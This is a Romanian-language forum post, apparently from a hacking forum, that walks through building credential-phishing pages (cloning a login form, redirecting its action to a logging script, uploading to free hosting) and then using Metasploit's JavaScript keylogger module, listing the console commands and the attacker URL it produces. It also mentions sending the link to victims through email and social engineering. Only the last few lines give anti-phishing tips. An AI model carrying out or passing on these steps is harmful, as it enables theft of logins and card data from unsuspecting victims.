Jump to content
Wubi

Website Keylogging folosind Metasploit

Recommended Posts

Posted

Cu totii cred ca stim cum sa facem o pagina de 'phishing'. Vom vedea in acest preview cum sa facem ceva pagini false.

Procedura prin care cream o pagina de phishing:

1. Pentru a crea o pagina de phishing, vei avea nevoie de:

1. * Fake Login Page

* Write.php

* account-ul ftp al paginii web

* Crearea fisierului write.php: folosind codul din inagine salveaza`l ca write.php:

* 052512_1627_EasyWebsite1.png?d9c344

* Crearea unui phishing page pentru website:

* * Prima data vom merge la Login URL pentru a vedea sursa paginii.

* Cautam "Action="

* Apoi adaugam "write.php id=" dupa "Action =" prin method = GET.

* Consultati figura de mai jos:

052512_1627_EasyWebsite2.png?d9c344

* Dupa care salvati pagina ca "login.html".

* Crearea unul FTP Account: My3gb.com - Free Web Hosting, FREE Website Hosting & Premium Web Hosting - 110mb.com sau oricare altul dintre multe site-uri disponibile pe internet care accepta free web hosting.

* Dupa ce te`ai inregistrat pe un free web hosting. Incarca cele doua fisiere, adica "login.html si write.php"

* Atacatorii folosesc diverse tehnici pentru a trimite link-uri false, care arata ca paginile adevarate, iar daca ei/ele intra in prerogativelor lor, atunci aceasta va ajunge in contul FTP

* Toti pasii de mai sus sunt necesari pentru a crea o pagina de phishing.

Acum rapid7 a introdus noua functie auxiliara pt JavaScript keylogger pe data de April 11, 2012, care folosita de un atacator, pentru a crea pagina, si trimite link-ul victimelor. Ca o victima cade in plasa, automat, ea apare in Metasploit msfconsole.

Kyloggerul JavaScript Metasploit seteaza un HTTP/HTTPS listener, ce serveste keylogger-ului JavaScript sa captureze keystrokes din retea.

Avantajul folosirii keylogger-ului JavaScript este acela ca nu necesita un ftp account pentru a uploada pagina falsa, si nu este nevoie sa scri un cod pentru write.php si pagina falsa.

Website Key logging folosind Metasploit

Aceasta este o tehnica mult mai usoara, ce a fost introdusa de echipa rapid7 pe 11 Aprilie,2012. Aici in acest caz atacatorul creaza o pagina falsa.

Demo:

Requirement:>Latest/ updated Metasploit framework version.

PASII PARCURSI DE ATACATOR:-

Cu scopul de a crea pagina de phishing, ai nevoie de fisierul JavaScript keylogger.js ce va fi uploadat de rapid7 foarte curand. Acum, sa vedem demo-ul prezentat de echipa Rapid7.

1. * Sa incepem cu msfconsole:

052512_1627_EasyWebsite3.png?d9c344

Urmeaza sa cautam Keylogger-ul scriind "search Keylogger".

052512_1627_EasyWebsite4.png?d9c344

Ii vom da o utilizare "Use auxiliary/server/capture/http_javascript_keylogger"

Daca vrei sa verici informatiile despre el scrie: "Info auxiliary/server/capture/http_javascript_keylogger"

052512_1627_EasyWebsite5.png?d9c344

Srie comenzile show option pentru a verifica optiunile disponibile.

052512_1627_EasyWebsite6.png?d9c344

Nota: - Acum in acest caz nu avem nicio pagina falsa disponibila. Este doar tutorialul pe care rapid7 l`a introdus in webinar.

* Acum setam demo pe true "set demo true"

052512_1627_EasyWebsite7.png?d9c344

* Dupa care setam uripath ca keylogger "Set uripath keylogger"

052512_1627_EasyWebsite8.png?d9c344

* Dupa setarea tuturor optiunilor necesare, pornim server-ul folosind comanda run.

052512_1627_EasyWebsite9.png?d9c344

* Dupa ce comanda este executata, executa serverul si generaza link-ul dupa cum se vede in imaginea de mai sus:

http://120.88.45.178:8080/keylogger

* In acest caz, noi deja am setat demo ca true pentru a accesa pagina demo, doar adaugand "/ demo" in URL

http://120.88.45.178:8080/keylogger/demo

*Un atacator mai poate folosi multe alte tehnici pentru a trimite URL-ul de mai sus unei victime folosind un email sau folosind tehnici de Social Engineering.

* VICTIM SIDE:

*Cand o victima primeste link-ul fals, el/ea sa nu fie avertizata despre acest tip de atac si sa intre pe acest gen de link:

Demo page:-

052512_1627_EasyWebsite10.png?d9c344

* Aici in pagina demo keylogger-ul JavaScript a fost incorporat in codul sursa, deci orice va scrie victima in login-box, keystroke-urile vor fi scrise in msfconsole al atacatorului.

* Daca observi in sursa paginii demo, aceasta arata ca in screenshot-ul de mai jos.

052512_1627_EasyWebsite11.png?d9c344

* Orice informatie pe care victima o va scrie, va fi capturata de JavaScript.

052512_1627_EasyWebsite12.png?d9c344

* Keystroke-urile capturate si stocate.

052512_1627_EasyWebsite13.png?d9c344

052512_1627_EasyWebsite14.png?d9c344

* Aceasta este aceiasi tehnica folosita de un atacator care fura informatii despre carduri de credit. El doar cloneaza login URL-ul website-ului pe care urmeaza sa`l hackeze, si`l distribuie victimelor folosind diverse tehnici.

* Cateva avertizari:

* Email-uri: Nu avea incredere in email-uri ce solicita date personale si financiare.

* Niciodata nu completa formulare in email-uri care iti cer sa completezi cu date personale/financiare.

* Intotdeauna fi sigur ca website-ul pe care depui date personale/financiare, sau orice alte informatii delicate, folosind un browser, este securizat. Asta inseamna ca ar trebui intotdeauna sa fi sigur ca folosesti https://www instead of http://www. Asta iti va indica faptul ca te afli pe un website securizat.

* Fi sigur ca browser-ul tau este la curent cu ultimele security updates. :)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...